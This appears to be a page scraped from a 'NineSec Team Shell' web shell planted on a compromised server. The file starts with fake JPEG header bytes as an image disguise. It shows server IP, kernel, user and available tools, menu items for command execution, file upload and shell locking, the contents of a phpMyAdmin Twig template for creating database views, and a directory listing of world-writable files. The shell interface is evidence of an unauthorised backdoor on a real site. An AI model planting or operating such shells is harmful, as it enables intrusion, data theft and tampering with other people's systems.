�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /home/readytorun/domains/demo.readytorun.it/public_html/phmad/templates/modals/../

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/readytorun/domains/demo.readytorun.it/public_html/phmad/templates/modals/../view_create.twig
<!-- CREATE VIEW options -->
<div id="div_view_options">
    <form method="post" action="{{ url('/view/create') }}">
    {{ get_hidden_inputs(url_params) }}
    <fieldset class="pma-fieldset">
        <legend>
            {% if ajax_dialog %}
                {% trans 'Details' %}
            {% else %}
                {% if view['operation'] == 'create' %}
                    {% trans 'Create view' %}
                {% else %}
                    {% trans 'Edit view' %}
                {% endif %}
            {% endif %}
        </legend>
        <table class="table align-middle rte_table">
            {% if view['operation'] == 'create' %}
                <tr>
                    <td class="text-nowrap"><label for="or_replace">OR REPLACE</label></td>
                    <td>
                        <input type="checkbox" name="view[or_replace]" id="or_replace"
                            {% if (view['or_replace']) %} checked="checked" {% endif %}
                            value="1">
                    </td>
                </tr>
            {% endif %}

            <tr>
                <td class="text-nowrap"><label for="algorithm">ALGORITHM</label></td>
                <td>
                    <select name="view[algorithm]" id="algorithm">
                        {% for option in view_algorithm_options %}
                            <option value="{{ option }}"
                                {% if view['algorithm'] == option %}
                                    selected="selected"
                                {% endif %}
                            >{{ option }}</option>
                        {% endfor %}
                    </select>
                </td>
            </tr>

            <tr>
                <td class="text-nowrap">{% trans 'Definer' %}</td>
                <td><input type="text" maxlength="100" size="50" name="view[definer]" value="{{ view['definer'] }}"></td>
            </tr>

            <tr>
                <td class="text-nowrap">SQL SECURITY</td>
                <td>
                    <select name="view[sql_security]">
                        <option value=""></option>
                        {% for option in view_security_options %}
                            <option value="{{ option }}"
                                {% if option == view['sql_security'] %} selected="selected" {% endif %}
                            >{{ option }}</option>
                        {% endfor %}
                    </select>
                </td>
            </tr>

            {% if view['operation'] == 'create' %}
                <tr>
                    <td class="text-nowrap">{% trans 'VIEW name' %}</td>
                    <td>
                        <input type="text" size="20" name="view[name]" onfocus="this.select()" maxlength="64" value="{{ view['name'] }}">
                    </td>
                </tr>
            {% else %}
                <tr>
                    <td>
                        <input type="hidden" name="view[name]" value="{{ view['name'] }}">
                    </td>
                </tr>
            {% endif %}

            <tr>
                <td class="text-nowrap">{% trans 'Column names' %}</td>
                <td>
                    <input type="text" maxlength="100" size="50" name="view[column_names]" onfocus="this.select()"  value="{{ view['column_names'] }}">
                </td>
            </tr>

            <tr>
                <td class="text-nowrap">AS</td>
                <td>
                    <textarea name="view[as]" id="view_as" rows="15" cols="40" dir="{{ text_dir }}">{{ view['as'] }}</textarea><br>
                    <input type="button" value="Format" id="format" class="btn btn-secondary button sqlbutton">
                    <span id="querymessage"></span>
                </td>
            </tr>

            <tr>
                <td class="text-nowrap">WITH CHECK OPTION</td>
                <td>
                    <select name="view[with]">
                        <option value=""></option>
                        {% for option in view_with_options %}
                            <option value="{{ option }}"
                                {% if option == view['with'] %} selected="selected" {% endif %}
                            >{{ option }}</option>
                        {% endfor %}
                    </select>
                </td>
            </tr>

        </table>
    </fieldset>

    <input type="hidden" name="ajax_request" value="1" />
    <input type="hidden" name="{{ (view['operation'] == 'create') ? 'createview' : 'alterview' }}" value="1" />

    {% if ajax_dialog == false %}
        <input type="hidden" name="ajax_dialog" value="1" />
        <input type="submit" class="btn btn-primary" name="" value="{% trans 'Go' %}" />
    {% endif %}

    </form>
</div>

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
September 11 2024 5:18:57
readytorun
0755
columns_definitions
--
September 11 2024 5:18:57
readytorun
0755
components
--
September 11 2024 5:18:57
readytorun
0755
config
--
September 11 2024 5:18:57
readytorun
0755
console
--
September 11 2024 5:18:57
readytorun
0755
database
--
September 11 2024 5:18:57
readytorun
0755
display
--
September 11 2024 5:18:57
readytorun
0755
encoding
--
October 24 2025 7:58:11
readytorun
0755
error
--
September 11 2024 5:18:57
readytorun
0755
export
--
September 11 2024 5:18:57
readytorun
0755
home
--
September 11 2024 5:18:57
readytorun
0755
import
--
September 11 2024 5:18:57
readytorun
0755
javascript
--
September 11 2024 5:18:57
readytorun
0755
login
--
September 11 2024 5:18:57
readytorun
0755
menu
--
September 11 2024 5:18:57
readytorun
0755
modals
--
September 11 2024 5:18:57
readytorun
0755
navigation
--
September 11 2024 5:18:57
readytorun
0755
plugins
--
September 11 2024 5:18:57
readytorun
0755
preferences
--
September 11 2024 5:18:57
readytorun
0755
relation
--
September 11 2024 5:18:57
readytorun
0755
server
--
September 11 2024 5:18:57
readytorun
0755
setup
--
September 11 2024 5:18:57
readytorun
0755
sql
--
September 11 2024 5:18:57
readytorun
0755
table
--
September 11 2024 5:18:57
readytorun
0755
test
--
September 11 2024 5:18:57
readytorun
0755
.htaccess
0.124 KB
November 14 2025 9:26:18
readytorun
0444
changelog.twig
0.446 KB
August 28 2023 5:02:04
readytorun
0777
create_tracking_version.twig
3.701 KB
August 28 2023 5:02:04
readytorun
0777
export.twig
23.073 KB
August 28 2023 5:02:03
readytorun
0777
export_modal.twig
0.646 KB
August 28 2023 5:02:04
readytorun
0777
file_select_options.twig
0.148 KB
August 28 2023 5:02:03
readytorun
0777
filter.twig
0.423 KB
August 28 2023 5:02:03
readytorun
0777
footer.twig
1.551 KB
August 28 2023 5:02:04
readytorun
0777
gis_data_editor_form.twig
12.182 KB
August 28 2023 5:02:04
readytorun
0777
header.twig
2.157 KB
August 28 2023 5:02:03
readytorun
0777
header_location.twig
0.637 KB
August 28 2023 5:02:04
readytorun
0777
import.twig
10.761 KB
August 28 2023 5:02:03
readytorun
0777
import_status.twig
0.109 KB
August 28 2023 5:02:03
readytorun
0777
indexes.twig
4.225 KB
August 28 2023 5:02:04
readytorun
0777
list_navigator.twig
2.287 KB
August 28 2023 5:02:03
readytorun
0777
message.twig
0.078 KB
August 28 2023 5:02:04
readytorun
0777
preview_sql.twig
0.294 KB
August 28 2023 5:02:03
readytorun
0777
recent_favorite_table_favorite.twig
0.485 KB
August 28 2023 5:02:04
readytorun
0777
recent_favorite_table_no_tables.twig
0.183 KB
August 28 2023 5:02:04
readytorun
0777
recent_favorite_table_recent.twig
0.168 KB
August 28 2023 5:02:04
readytorun
0777
scripts.twig
0.783 KB
August 28 2023 5:02:04
readytorun
0777
select_all.twig
0.371 KB
August 28 2023 5:02:03
readytorun
0777
top_menu.twig
1.065 KB
August 28 2023 5:02:04
readytorun
0777
transformation_overview.twig
1.331 KB
August 28 2023 5:02:04
readytorun
0777
user_password.twig
0.081 KB
August 28 2023 5:02:03
readytorun
0777
view_create.twig
4.73 KB
August 28 2023 5:02:04
readytorun
0777

NineSec Team - 2022